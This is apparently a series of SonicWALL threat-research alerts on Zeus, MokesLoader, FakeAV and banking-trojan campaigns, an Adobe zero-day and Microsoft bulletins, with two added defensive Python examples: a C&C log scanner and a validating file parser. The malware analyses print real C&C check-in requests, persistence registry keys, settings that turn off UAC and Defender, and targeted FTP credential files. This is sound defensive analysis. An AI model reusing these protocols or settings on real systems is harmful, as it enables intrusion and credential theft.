Zeus spam campaigns continue – Year 2012 (Jan 13, 2012)

SonicWALL UTM Research team observed reports of multiple spam campaigns involving new variants of the Zeus Trojan. The most recent campaign involved emails pretending to be from the US Department of Homeland Security’s CERT division, warning the user of a phishing incident and containing a zipped attachment. The zipped attachment is a newer variant of the Zeus Trojan.

Below is a sample of e-mail subjects and targeted organizations seen in these spam campaigns in the past week:

  • Phishing incident report call number: PH000000(Random Number)
    Spoofed: US Government- Computer Emergency Readiness Team
  • FDIC: About your business account (12 digit Alphanumeric)
    Spoofed: US Government- Federal Deposit Insurance Corporation
  • Your Billing Summary as of (DATE)
    Spoofed: Con Edison Inc.
  • DHL Parcel Tracking Notification (Random Number)
    Spoofed: DHL Courier service

SonicWALL Research team has received more than ten unique payloads from these campaigns in the past week. The Zeus binaries found in the zipped attachments look like:

screenshot

Upon execution, it performs the following activities:

  • Checks whether it is running in a virtual environment (VBOX, VMware, Virtual PC) and contains anti-debugging code to thwart analysis.
  • Drops the following files on the system and runs them:
    • (Application Data)\feahulbofuiv.exe [Detected as GAV: Zbot.YW_163 (Trojan)]
    • (Temp)\tmp242dfb15.bat [Deletes the original file and then deletes itself]
  • Creates a registry entry to ensure that the dropped file runs on system reboot.
  • Connects to a remote C&C server based in China and sends the victim machine’s information:

      POST /stone2012.php HTTP/1.1
      Host: plantlunch.ru
      .....
      bn1=XXXX&sk1=XXXXX

      POST /jinjer.php HTTP/1.1
      Host: viperheart.ru

SonicWALL Gateway AntiVirus provides proactive protection against these spam campaigns via the following signatures:

  • GAV: Zbot.YMH (Trojan)
  • GAV: Zbot.YW_163 (Trojan)

screenshot

Microsoft Security Bulletin Coverage (Jan 10, 2012)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of January, 2012. A list of issues reported, along with SonicWALL coverage information follows:

MS12-001 Vulnerability in Windows Kernel Could Allow Security Feature Bypass (2644615)

  • CVE-2012-0001 Windows Kernel SafeSEH Bypass Vulnerability
    This is a local vulnerability.

MS12-002 Vulnerability in Windows Object Packager Could Allow Remote Code Execution (2603381)

  • CVE-2012-0009 Object Packager Insecure Executable Launching Vulnerability
    IPS: 3312 – Suspicious CIFS Traffic 17

MS12-003 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2646524)

  • CVE-2012-0005 CSRSS Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS12-004 Vulnerabilities in Windows Media Could Allow Remote Code Execution (2636391)

  • CVE-2012-0003 MIDI Remote Code Execution Vulnerability
    IPS: 7274 – Suspicious Audio 1b
  • CVE-2012-0004 DirectShow Remote Code Execution Vulnerability
    There is no way to distinguish between normal and attack traffic.

MS12-005 Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2584146)

  • CVE-2012-0013 Assembly Execution Vulnerability
    IPS: 7275 – Malformed PowerPoint Document 3b

MS12-006 Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584)

  • CVE-2011-3389 SSL and TLS Protocols Vulnerability
    There is no way to distinguish between normal and attack traffic.

MS12-007 Vulnerability in AntiXSS Library Could Allow Information Disclosure (2607664)

  • CVE-2012-0007 AntiXSS Library Bypass Vulnerability
    IPS: 3357 – MS IE CSS Cross Domain Information Disclosure 2

DHL spam campaign leads to MokesLoader Trojan Downloader (Jan 06, 2012)

SonicWALL UTM Research team observed an increase in spam campaigns employing DHL package delivery schemes. The emails, pretending to be from DHL, inform the user of a package being sent to their address and that the relevant tracking number is in the attachment. The zipped attachment in the email is a newer variant of the MokesLoader Trojan downloader.

Email subjects used in this spam campaign include:

  • DHL Delivery refuse
  • DHL Error package delivery
  • DHL shipment status No***
  • Error in the delivery address
  • Error in the delivery address No*******
  • Error package delivery
  • Get your parcel No***
  • Shipment Status No***
  • Track your parcel No******
  • Track your shipment No****

The body of the email is as shown below:

  ---------------------------------------------------------------------
  Dear customer.

  Your package has been sent to your address.
  Please find a post label attached which contains a track number of
  your package.

  Thank you for your attention.
  DHL Global Services.
  ---------------------------------------------------------------------

The following file with a misleading icon is present in the zip attachment:

screenshot

It performs the following activities when executed:

  • It creates the following files:
    • %appdata%\csrss.exe (Copy of itself) [Detected as GAV: MokesLoader.MS (Trojan)]
    • %appdata%\Microsoft\Protect\qbfbv.xx
    • %appdata%\Microsoft\Protect\rpphtrt.nv
  • It reports the new infection to a remote server using a uniquely generated login id:
    • GET /aaa/index.php?cmd=getload&login={removed}&sel=sp3ya&ver=5.1&bits=0&file=1&run=ok
  • It creates the following registry entries to ensure the infection survives reboot:
    • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run Clients “%appdata%\csrss.exe”
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mcoyr “rundll32 %appdata%\MICROS~1\Protect\rpphtrt.nv, itgn”
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run imfblgk “rundll32 %appdata%\MICROS~1\Protect\qbfbv.xx, namn”
  • It creates a TCP backdoor on the infected machine:
    screenshot
  • It reports the backdoor port to the remote server:
    • GET /aaa/index.php?cmd=getsocks&login={removed}&port=2592 HTTP/1.1
  • The following commands were used to communicate with the remote server:
    • getgrab
    • getproxy
    • getload
    • getsocks
  • It receives instructions from the remote server and downloads additional malware.
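As an added example (not SonicWALL's code), the following Python scanner flags the check-ins described in this MokesLoader write-up and in the Zeus write-up above when run over proxy log lines; the paths, hosts and parameter names come from the two write-ups, while the log layout, the client addresses and the MokesLoader server address are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Check-in patterns taken from the Zeus and MokesLoader write-ups above.
ZEUS_CHECKIN_PATHS = {"/stone2012.php", "/jinjer.php"}
ZEUS_POST_KEYS = {"bn1", "sk1"}
MOKES_PATH = "/aaa/index.php"
MOKES_COMMANDS = {"getgrab", "getproxy", "getload", "getsocks"}

# Constructed proxy log layout (an assumption, not a real product format):
#   <timestamp> <client-ip> <method> <host> <path-with-query> [<post-body>]
LOG_LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\S+)(?: (\S+))?$")


def classify(line):
    """Return (label, client, host) for a matching check-in, else None."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    _ts, client, method, host, target, body = m.groups()
    url = urlsplit(target)
    if method == "POST" and url.path in ZEUS_CHECKIN_PATHS:
        # Zeus posts its identifiers as bn1/sk1 form fields.
        if set(parse_qs(body or "")) & ZEUS_POST_KEYS:
            return ("zeus_checkin", client, host)
    if method == "GET" and url.path == MOKES_PATH:
        # MokesLoader drives its C&C dialogue through the cmd= parameter.
        cmd = parse_qs(url.query).get("cmd", [""])[0]
        if cmd in MOKES_COMMANDS:
            return (f"mokesloader_{cmd}", client, host)
    return None


def scan(lines):
    """All check-ins found in the given log lines, in log order."""
    return [hit for hit in map(classify, lines) if hit]


def infected_clients(lines):
    """Sorted list of client addresses that produced at least one check-in."""
    return sorted({hit[1] for hit in scan(lines)})


# Constructed log lines. The Zeus hosts are the ones named in the write-up;
# the MokesLoader server address is a documentation-range placeholder.
SAMPLE_LOG = [
    "2012-01-13T10:00:01Z 10.0.0.5 POST plantlunch.ru /stone2012.php bn1=XXXX&sk1=XXXXX",
    "2012-01-13T10:00:02Z 10.0.0.5 GET www.example.com /index.html",
    "2012-01-06T09:12:44Z 10.0.0.7 GET 192.0.2.10 /aaa/index.php?cmd=getload&login=REDACTED&sel=sp3ya&ver=5.1&bits=0&file=1&run=ok",
    "2012-01-06T09:13:10Z 10.0.0.7 GET 192.0.2.10 /aaa/index.php?cmd=getsocks&login=REDACTED&port=2592",
    "2012-01-06T09:14:00Z 10.0.0.8 GET shop.example.com /aaa/index.php?cmd=search&q=label",
    "2012-01-13T10:05:00Z 10.0.0.9 POST viperheart.ru /jinjer.php bn1=YYYY",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```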

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: MokesLoader.MS (Trojan)
  • GAV: MokesLoader.MK (Trojan)
  • GAV: MokesLoader.LS (Trojan)
  • GAV: MokesLoader.LH (Trojan)
  • GAV: Dofoil.L#email (Trojan)

screenshot

IWS Remote Agent Module Design Weakness (Jan 5, 2012)

InduSoft Web Studio (IWS) is a collection of automation tools that provide the building blocks to develop HMIs (Human-Machine Interfaces), SCADA (Supervisory Control and Data Acquisition) systems and embedded instrumentation solutions. Typically an InduSoft Web Studio project runs on an embedded Windows device, which connects to machines, processors or other data-acquisition equipment. The embedded Windows device can connect to a Remote Agent component, which supports various message types in order to handle different tasks.

A design flaw exists in the Remote Agent component of InduSoft Web Studio. Specifically, the vulnerability is due to a lack of authentication when handling client requests. A remote attacker can exploit this vulnerability by sending a crafted message to the Remote Agent component. Successful exploitation can result in arbitrary file creation or code execution in the security context of the Remote Agent process.

The vulnerability has been assigned CVE-2011-4051.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 7265 InduSoft Web Studio Remote Code Execution

Microsoft out-of-band Bulletin MS11-100 (Dec 30, 2011)

Microsoft released the out-of-band bulletin MS11-100 on Dec 29th, 2011, addressing four vulnerabilities. The bulletin is rated by Microsoft as critical, and the vulnerabilities are listed below:

  • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
  • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
  • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
  • ASP.NET Forms Authentication Ticket Caching Vulnerability – CVE-2011-3417

SonicWALL UTM team researched these vulnerabilities on the same day and created several IPS signatures to capture the attack traffic. Due to the nature of the vulnerabilities, it is hard to distinguish legitimate traffic from attack traffic for some of them. The following is the list of covered vulnerabilities and their IPS signatures:

  • Collisions in HashTable May Cause DoS Vulnerability – CVE-2011-3414
    • 7260 Microsoft .NET Framework Denial of Service
    • 7261 Microsoft .NET Framework Denial of Service 2
  • Insecure Redirect in .NET Form Authentication Vulnerability – CVE-2011-3415
    • 7262 ASP.NET Forms Authentication Redirect Vulnerability
  • ASP.Net Forms Authentication Bypass Vulnerability – CVE-2011-3416
    • 7263 ASP.NET Forms Authentication Bypass 1
    • 7264 ASP.NET Forms Authentication Bypass 2

For the Microsoft vulnerabilities covered by SonicWALL, please refer to SonicWALL MAPP for details.

American Airlines Ticket Spam – XP Home Security 2012 (Dec 22, 2011)

The SonicWALL UTM Research team discovered a new spam campaign spreading a well-known FakeAV: XP Home Security 2012.

The Trojan spreads through email and arrives as a zipped email attachment purporting to be from American Airlines:

The Trojan uses the following icon in an attempt to masquerade as a harmless PDF file:

The Trojan performs the following DNS queries:

  • www.mortg{removed}.tv
  • www.google.com
  • refunados{removed}.ru
  • www.tria{removed}.org

The Trojan spawns and injects code into svchost.exe causing it to make the following HTTP GET request from a compromised remote webserver:

The Trojan downloads 1.exe, renames it to gio.exe and executes it. It uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe [Detected as GAV: FakeAv.JICD (Trojan)]
  • C:\Documents and Settings\{USER}\Application Data\csrss.exe [Detected as GAV: Bredo.T (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\Application Data\708j72l30qfte5ro4u62483b417elw [Detected as GAV: FakeAvCn.C (Trojan)]

The Trojan adds the following keys to the Windows registry:

  • HKEY_CLASSES_ROOT\J2\shell\open\command “C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe” -a “%1” %*
  • HKEY_CLASSES_ROOT\.exe\shell\open\command “C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe” -a “%1” %*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run “WinRAR SFX” “C:\Documents and Settings\{USER}\Application Data\csrss.exe”
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run “bieovju rundll32 C:\DOCUME~1\{USER}\APPLIC~1\MICROS~1\Protect\yxikrlc.n, dquc”

The Trojan deletes the following keys from the Windows registry to disable automatic updates:

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WUAUSER
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv

The Trojan runs gio.exe using the following command line:

      "C:\Documents and Settings\{USER}\Local Settings\Application Data\gio.exe" -dtm -a

The Trojan pops up the following FakeAV windows in an attempt to fool the user into buying the software:

The Trojan blocks certain applications from running such as Task Manager, and Internet Explorer:

The Trojan was observed opening the following files and directories:

      C:\Program Files\Common Files\Ipswitch\WS_FTP\*.*0x00
      C:\Documents and Settings\{USER}\Application Data\Ipswitch\WS_FTP\Sites\*.*
      C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat
      C:\Documents and Settings\{USER}\Application Data\FileZilla\sitemanager.xml
      C:\Documents and Settings\{USER}\Application Data\FileZilla\recentservers.xml

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Bredo.T (Trojan)
  • GAV: FakeAv.JICD (Trojan)
  • GAV: FakeAvCn.C (Trojan)

Microsoft Publisher Memory Corruption (Dec 21, 2011)

Microsoft Publisher is a document design application for print, web, and various other formats. Publisher is available individually or as part of the Microsoft Office suite. The default file extension for Publisher files is .pub.

The Publisher file format specification is not publicly available. It does share some features with other Microsoft file formats. Publisher files are stored in the Microsoft Compound File meta-format, which specifies a virtual filesystem encapsulated within a file. In a Compound Document, data is stored in streams within storages. Publisher data is known to reside in the Root Entry\Contents and Root Entry\Escher\EscherStm streams.

The streams appear in a common form, outlined in the following tables:

  Offset   Length   Description
  -------  -------  --------------------------------
  0x0000   4        structure size (n)
  0x0004   n-4      structure data

Structure data is composed of a variable number of consecutive fields, which have the following format:

  Offset   Length   Description
  -------  -------  --------------------------------
  0x0000   2        index and type (two-byte structure)
  0x0002   4        size n (present based on type value)
  0x0006   n-4      data

The size of the data field and the presence of the size field depend on the type. Types 16, 18, 20, 24, and 26 seem to indicate the presence of the size field, and in these cases the data field begins at offset 0x0006. Types that do not indicate the presence of the size field have an implied size that is known to the application, and their data begins at offset 0x0002. Publisher files are also known to contain OfficeArt records. Some OfficeArt records are specified by the host application and can contain structures encoded in the above format. In particular, the OfficeArtClientAnchor record encodes data using this method.

A memory corruption vulnerability exists in Microsoft Publisher. The flaw is due to the way in which variable-length fields are processed: the size field value is not validated, and it is used to compute a pointer that is then used to read the data field.
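As an added illustration (not SonicWALL's code and not real Publisher data), the following Python parser walks a stream structure laid out as in the two tables above and rejects any field whose size would carry the data pointer outside the enclosing structure, which is the validation the flaw described here is missing; the split of the two-byte header into index and type, the implied-size table and the sample bytes are assumptions, since the page does not specify them.

```python
import struct

# Types that carry an explicit 4-byte size field (from the write-up above).
SIZED_TYPES = {16, 18, 20, 24, 26}
# Implied sizes for unsized types: a hypothetical stand-in, the real table
# is internal to Publisher.
IMPLIED_SIZES = {1: 1, 2: 2, 4: 4, 8: 8}

def split_index_type(word):
    # Assumption: low byte of the two-byte header is the type, high byte the index.
    return word >> 8, word & 0xFF

def parse_structure(blob):
    """Parse one stream structure into [(index, type, data), ...].
    Every length read from the file is checked against the enclosing structure
    before it becomes an offset; that is the check the vulnerable parser lacked."""
    if len(blob) < 4:
        raise ValueError("truncated structure header")
    (n,) = struct.unpack_from("<I", blob, 0)
    if n < 4 or n > len(blob):
        raise ValueError(f"structure size {n} does not fit in {len(blob)} bytes")
    fields, off, end = [], 4, n
    while off < end:
        if end - off < 2:
            raise ValueError(f"truncated field header at {off:#x}")
        (word,) = struct.unpack_from("<H", blob, off)
        index, ftype = split_index_type(word)
        if ftype in SIZED_TYPES:
            if end - off < 6:
                raise ValueError(f"truncated size field at {off + 2:#x}")
            (size,) = struct.unpack_from("<I", blob, off + 2)
            data_start, data_len = off + 6, size - 4
            # Untrusted size: it must cover itself and stay inside the structure.
            if size < 4 or data_start + data_len > end:
                raise ValueError(f"field size {size:#x} at {off + 2:#x} leaves the structure")
        else:
            if ftype not in IMPLIED_SIZES:
                raise ValueError(f"unknown unsized type {ftype}")
            data_start, data_len = off + 2, IMPLIED_SIZES[ftype]
            if data_start + data_len > end:
                raise ValueError(f"implied size of type {ftype} overruns the structure")
        fields.append((index, ftype, bytes(blob[data_start:data_start + data_len])))
        off = data_start + data_len
    return fields

def is_well_formed(blob):
    try:
        parse_structure(blob)
        return True
    except ValueError:
        return False

# Constructed samples (not real Publisher data) built with the same layout.
def build_field(index, ftype, data):
    header = struct.pack("<H", (index << 8) | ftype)
    if ftype in SIZED_TYPES:
        return header + struct.pack("<I", len(data) + 4) + data
    return header + data

def build_structure(fields):
    body = b"".join(build_field(*f) for f in fields)
    return struct.pack("<I", len(body) + 4) + body

SAMPLE_FIELDS = [(1, 2, b"\x01\x00"), (2, 16, b"hello")]

def malformed_sample():
    """Same structure, but the second field claims a size of 0xFFFFFFF0."""
    good = build_structure(SAMPLE_FIELDS)
    # Size field offset: 4 (header) + 4 (first field) + 2 (index/type) = 10.
    return good[:10] + struct.pack("<I", 0xFFFFFFF0) + good[14:]
```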

A remote attacker can entice a target user to open a specially crafted Microsoft Publisher document to exploit this vulnerability. A successful exploitation attempt may result in arbitrary code execution. An unsuccessful attempt may crash the affected application. Exploiting this vulnerability for code execution is not a trivial task, but it is possible.

SonicWALL has released two IPS signatures to address known exploits targeting this vulnerability. The following signatures have been released:

  • 7227 – Malformed Publisher Document 4b
  • 7237 – MS Publisher Array Indexing Memory Corruption (MS11-091)

In addition to the specific signatures released to address this threat, SonicWALL has existing sets of IPS signatures which proactively detect and block widely used exploitation techniques that may be utilized in attacks against this particular vulnerability.

The vendor has released a security bulletin addressing this issue. The vulnerability has been assigned CVE-2011-3411 by MITRE.

Banker.WXS infects bootloader and steals banking data (Dec 15, 2011)

SonicWALL UTM Research team received reports of a new banking Trojan in the wild. This banking Trojan infects the Windows NT system’s NTLDR bootloader, the file that runs before the computer’s operating system. It also steals banking data and targets files related to GBPlugin, a browser security plug-in used mostly by Brazilian banks.

The source of this Trojan has been linked to spam email containing download links.

Once the user downloads and executes the Trojan, it performs the following activities:

Downloads the file wxp.zip that contains the following:

  • xp-msantivirus
  • xp-msclean
  • ntldrv2
  • menu.lst
  • clean.bat

Makes a backup of the system’s ntldr as ntldr.old and replaces the original ntldr with the ntldrv2 file.
The new ntldr file is a modified GRUB bootloader that runs the file menu.lst.

The menu.lst is responsible for calling the files xp-msantivirus and xp-msclean during the system’s reboot. These two files will later remove files related to GBPlugin and other security software.

Files Created:

  • {Computer Name}12k12v3r1.exe – copy of banker trojan

Added Registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {Computer Name} “Application Data\{Computer Name}12k12v3r1.exe”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced EnableBalloonTips dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains
  • Disables User Account Control notifications by adding the following entries:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center UacDisableNotify dword:00000001
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system EnableLUA dword:00000000
  • Disables Windows Defender by replacing the data pointing to its file:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender VTNC

Deleted Registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains @ “”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges @ “”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains @ “”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges @ “”

After the installation, the system will be forced to reboot:

    screenshot

    Translation: “Windows Update is restarting your computer to install the critical security updates”

    screenshot
    Translation:

     Please wait while the operation is performed. Don't turn off or restart your computer.
     ATTENTION: files infected with viruses were found on your computer...
     Starting the process of removing viruses: Process started...
     This process may take a while depending on the number of virus-infected files found.
     Do not turn off or restart your computer during this process; wait for its completion,
     your computer will be restarted automatically.
     Process completed successfully... Restarting the computer.

    screenshot

    Translation: Booting... Starting the Microsoft Malicious Software Removal Tool

    screenshot

    Translation:

     Malicious Software Removal Tool
     Do not turn off or unplug the machine until this process completes

During the system's reboot, the Trojan removes the browser security plug-in GBPlugin and other security software, which opens the computer system up to other malicious software. It tries to connect to other URLs, possibly to download additional malware. It also covers its tracks by deleting the originally downloaded files.

Network Activity:

  • Remote Server: 50.1{REMOVED}59/.RECURSOS/
  • DNS Queries:
    • smartp{REMOVED}yhoster.com
    • multip{REMOVED}omeze.com
    • arowhe{REMOVED}com
    • timbe{REMOVED}com
    • weigot{REMOVED}.com

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV: Banker.WXS (Trojan)

Adobe Reader and Acrobat Zero Day exploit (Dec 9, 2011)

SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability could lead to an application crash, and may potentially allow the attacker to gain control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning users about this flaw.

SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability in the wild: a specially crafted PDF file containing malicious encoded JavaScript and a malicious U3D object. The exploit may arrive via e-mail or can be served via a malicious drive-by site.

A code snippet from the decoded version of the JavaScript that performs the heap spray and drops a malicious executable file onto the target machine can be seen below:

screenshot

The malicious PDF file when opened performs the following activity on victim machine:

  • The encoded JavaScript uses a heap spraying technique to crash the application and redirects to the second document page, as seen below.

    screenshot

    screenshot

  • It drops a backdoor Trojan on the target machine and runs it:
    • (USER)\Local Settings\pretty.exe [Detected as GAV: Wisp.A_2 (Trojan)]
  • Creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\office = “(USER)\Local Settings\pretty.exe”
  • The dropped backdoor Trojan will further attempt to connect to a remote server prettyli(REMOVED)com and sends the following requests:
    • GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
    • GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122

SonicWALL UTM appliance provides protection against this threat via the following signatures:

  • GAV: CVE-2011-2462.A (Exploit)
  • IPS: Malformed PDF File 14b

Microsoft Security Bulletin Coverage (Dec 13, 2011)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of December, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-087 Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)

  • CVE-2011-3402 TrueType Font Parsing Vulnerability
    GAV: Malformed.ttf.MP.1

MS11-088 Vulnerability in Microsoft Office IME (Chinese) Could Allow Elevation of Privilege (2652016)

  • CVE-2011-2010 Pinyin IME Elevation Vulnerability
    This is a local vulnerability.

MS11-089 Vulnerability in Microsoft Office Could Allow Remote Code Execution (2590602)

  • CVE-2011-1983 Word Use After Free Vulnerability
    GAV: Malformed.doc.MP.4

MS11-090 Cumulative Security Update of ActiveX Kill Bits (2618451)

  • CVE-2011-3397 Microsoft Time Remote Code Execution Vulnerability
    IPS: 7224 – MS IE Time Element Remote Code Execution 1
    IPS: 7225 – MS IE Time Element Remote Code Execution 2

MS11-091 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution (2607702)

  • CVE-2011-1508 Publisher Function Pointer Overwrite Vulnerability
    No details available.
  • CVE-2011-3410 Publisher Out-of-bounds Array Index Vulnerability
    IPS: 7226 – Malformed Publisher Document 3b
  • CVE-2011-3411 Publisher Invalid Pointer Vulnerability
    IPS: 7227 – Malformed Publisher Document 4b
  • CVE-2011-3412 Publisher Memory Corruption Vulnerability
    IPS: 7228 – Malformed Publisher Document 5b

MS11-092 Vulnerability in Windows Media Could Allow Remote Code Execution (2648048)

  • CVE-2011-3401 Windows Media Player DVR-MS Memory Corruption Vulnerability
    GAV: MsApp.Exp.MP.2

MS11-093 Vulnerability in OLE Could Allow Remote Code Execution (2624667)

  • CVE-2011-3400 OLE Property Vulnerability
    IPS: 7230 – Malformed Visio Document 4b

MS11-094 Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2639142)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3413 OfficeArt Shape RCE Vulnerability
    GAV: Malformed.ppt.MP.2

MS11-095 Vulnerability in Active Directory Could Allow Remote Code Execution (2640045)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    It is not possible to distinguish attack from normal traffic.

MS11-096 Vulnerability in Microsoft Excel Could Allow Remote Code Execution (2640241)

  • CVE-2011-3403 Record Memory Corruption Vulnerability
    GAV: Malformed.xls.MP.11

MS11-097 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2620712)

  • CVE-2011-3408 CSRSS Local Privilege Elevation Vulnerability
    This is a local vulnerability.

MS11-098 Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2633171)

  • CVE-2011-2018 Windows Kernel Exception Handler Vulnerability
    This is a local vulnerability.

MS11-099 Cumulative Security Update for Internet Explorer (2618444)

  • CVE-2011-1992 XSS Filter Information Disclosure Vulnerability
    This is a cross domain vulnerability. It is not possible to distinguish attack from normal traffic.
  • CVE-2011-2019 Internet Explorer Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3404 Content-Disposition Information Disclosure Vulnerability
    It is not possible to distinguish attack from normal traffic.